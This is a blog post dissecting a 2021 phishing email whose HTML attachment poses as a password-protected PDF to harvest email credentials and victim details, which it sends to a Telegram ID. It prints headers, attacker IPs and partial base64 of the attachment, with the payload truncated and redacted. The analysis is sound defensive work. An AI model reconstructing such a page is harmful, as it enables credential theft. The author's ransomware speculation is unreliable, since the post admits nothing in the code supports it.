Sending You the Bounced Cheque… – Malware

Technology
, , ,
Check
   Reading time 6

Sending you the bounced cheque... - Malware/Phishing

This one required the scammer to do a little work before they sent out their mass email.

The body of the message is fairly straightforward, it is just trying to get me to open the attachment.

The first indication that this is likely a scam or contains malware is that they want me to open the attachment. The second is the spelling “sinding” and “cheque”. Cheque is the European spelling for the check, but this email is coming from the U.S.

So, what do I do? I open the attachment (in my sandboxed environment of course).

Now I have to say that this is one of the cooler scams I have seen, at least in the realm of it is different and I could see someone clicking on it.

Email Hader:

Received: from hwsrv-895150.hostwindsdns.com ([23.254.203.197])
by host.averagejoeweeky.com with esmtps (TLS1.2) tls TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
(Exim 4.94.2)
(envelope-from <admin@iccadmin.com>)
id 1madqx-00076O-RY
for joe@averagejoeweeky.com; Wed, 13 Oct 2021 08:59:27 -0400
Received: from iccadmin.com (unknown [20.102.56.31])
by hwsrv-895150.hostwindsdns.com (Postfix) with ESMTPA id F1FBB4D43
for <joe@averagejoeweeky.com>; Wed, 13 Oct 2021 12:59:14 +0000 (UTC)
From: Mark Johnson<admin@iccadmin.com>
To: joe@averagejoeweeky.com
Subject: Sending you the bounced cheque…
Date: 13 Oct 2021 12:59:11 +0000
Message-ID: <20211013125911.52F66D7805C439EA@iccadmin.com>
MIME-Version: 1.0
Content-Type: multipart/mixed;

The sender domain is iccadmin.com, which has nothing visible at that address, and the domain name was registered on June 15, 2021 and is set to domain privacy.

The email appeared to come from a leased Microsoft IP address out of Virginia.


The full email body is:

Email Body:
Message-ID: <20211013125911.52F66D7805C439EA@iccadmin.com>
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary=”—-=_NextPart_000_0012_AD5C13A4.A3F28E3E”
This is a multi-part message in MIME format.
——=_NextPart_000_0012_AD5C13A4.A3F28E3E
Content-Type: text/html;
charset=”iso-8859-1″
Content-Transfer-Encoding: quoted-printable

w3.org/TR/html4/loose.dtd”>

Good day,

I’m sinding you the bounced cheque we received,
pl=

ease kindly check and revert back to use as we are working on the project. =

Best regards,
Mark Johnson
Superintendent…
A&G.</=

P>
——=_NextPart_000_0012_AD5C13A4.A3F28E3E
Content-Type: text/html; name=”BOUNCED CHEQUE NO 003278.htm”
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=”BOUNCED CHEQUE NO 003278.htm”
PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBzdHlsZT0iYm94LXNpemluZzogYm9yZGVyLWJveDsi
Pg0KPGhlYWQgc3R5bGU9ImJveC1zaXppbmc6IGJvcmRlci1ib3g7Ij4NCjx0aXRsZSBzdHls
ZT0iYm94LXNpemluZzogYm9yZGVyLWJveDsiPlBERiBGSUxFPC90aXRsZT4NCjxsaW5rIHJl
****************************** TRUNCATED ***************************************************
cmxfc3RyaW5nKTsNCnZhciBjaWQgPSB1cmwuc2VhcmNoUGFyYW1zLmdldCgiaWQiKTsNCmlm
KGNpZCl7DQpkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiZW1haWwiKS52YWx1ZSA9IGNpZDsN
Cn0NCjwvc2NyaXB0Pg0KPC9ib2R5Pg0KPC9odG1sPg==
——=_NextPart_000_0012_AD5C13A4.A3F28E3E–

The attachment is actually designed to try to do two different tasks. The first is to get your email password. When you launch the attachment, it opens up this base64 encoded fancy HTML and JavaScript page that makes it look like you need to enter in a password to get to the “protected” Abode Acrobat PDF file. Now the file itself does not exist, it is just a blurry grab of a random PDF file used as the background of the page.

Here is the base64 encoded HTML attachment from the email and how it works (I redacted the dangerous parts):

******* Creating what you see *********
This is the section that setups what you visibly can see.
 

******* END Creating what you see *****************

******* Start some of the bad stuff ***************
This is the payload, or the part that does the damage

 
HyEooCHva6oeDcGfNLA7eGgAH6100KjytY7fAU83Uc9yi12t8xrODvBpXSvxKoBzpM4QBwsXB+2YDkFu5bzE8llYCxCyV8IKEbI8zFYmWIqOcsuZLYlqQREUzOEREAREQBERAEREB8WDlmvhCA87wvLKxe5zVC9iA1kka8741tnRKJ0CA1LolgYVtTTr52OgNVol9ES2fY6djoDXCJStiXuFOs2wIDyxxr1RMUjYVMyNAfYwp2hYtapAEB9CyXxfUAREQBERAEREAREQBERAF8X1EBiQsS1ZpZARFixMamslkBBo180a9FksgPPo00a9FksgINGvojU1ksgIgxZBqzsvtkBiAskX1AEREAREQBERAEREAREQBERAEREAREQBERAEREAREQBERAEREAREQBERAEREAREQBERAf//Z” alt=”” height=”110″ class=”img” style=”box-sizing: border-box;padding-left: 2rem;padding-top: .5rem;position: fixed;”>
 
 
 


Sign in to view the document

 
 
 

Must be a valid email address.
 
 
 
 



 

Your password must be at least 6 characters as well as contain at least one uppercase, one lowercase, and one number.
 


 
 
 

The whole process above is designed to have you input your password for your email address. This is relying on human nature, that they will automatically put in their email password as that is the request. They collect some information as well:

  • Your username and password
  • OS version
  • Your IP Address (which they query ipinfo.io) which give them:
    ip: “212.102.51.201”  (My proxy IP address)
    hostname: “unn-212-102-51-201.cdn77.com”
    city: “Tokyo”
    region: “Tokyo”
    country: “JP”
    loc: “35.6769,139.6520”
    org: “AS60068 Datacamp Limited”
    postal: “168-0063”
    timezone: “Asia/Tokyo”
    asn: Object
    asn: “AS60068”
    name: “Datacamp Limited”
    domain: “datacamp.co.uk”
    route: “212.102.50.0/23”
    type: “isp”
    company: Object
    name: “Datacamp Limited”
    domain: “datacamp.co.uk”
    type: “isp”
    privacy: Object
    vpn: true
    proxy: false
    tor: false
    hosting: false
    relay: false
    abuse: Object
    address: “DataCamp Limited, 207 Regent Street, London, United Kingdom”
    country: “JP”
    email: “abuse@datacamp.co.uk”
    name: “Abuse Contact”
    network: “212.102.50.64-212.102.51.255”
    phone: “”
    domains: Object
    total: 0
    domains: Array
  • But they are only seeking IP, Country Name, City, Region and Currency
  • They also query the local system for Time and Screen Size

This information is also sent via Telegram (text message app) to ID:1001228517612

They actually do a fair amount of parsing with in the html/JavaScript itself, instead of within the php script on the compromised domain.

As an example they parse the email address joe@averagejoeweekly.com into http://averagejoeweekly.com

Analysis:

Running this through VirusTotal shows:

Based that AV is picking this up as a Cryxos, which must be what the php script on the compromised website is doing. I can’t penetrate that script, they have it fairly well protected. But that is the script that sets off the anti-virus software. Once the URL is removed, the script passes AV scans. The fact that they detect it as a Cryxos variant, means that they must be turning this into some sort of ransomware as well. So not only are they collecting your email password, they are trying to infect that system with ransomware. I don’t see anything in the above that signals ransomware. My locally installed AV picks it up as HEUR:Trojan.Script.Generic, which makes more sense.

facebookShare on Facebook
TwitterTweet
FollowFollow us
PinterestSave
Average Jow Weekly Logo
Average Joe

Welcome to the Average Joe Weekly blog. This is basically my place on the web where I can help spread some of the knowledge that I have accumulated over the years. I served 10+ years in the Marine Corps on Active Duty, but that was some 25 years ago.

Related Posts:

Avatar photo

By Average Joe

Welcome to the Average Joe Weekly blog. This is basically my place on the web where I can help spread some of the knowledge that I have accumulated over the years. I served 10+ years in the Marine Corps on Active Duty, but that was some 25 years ago.

Leave a comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.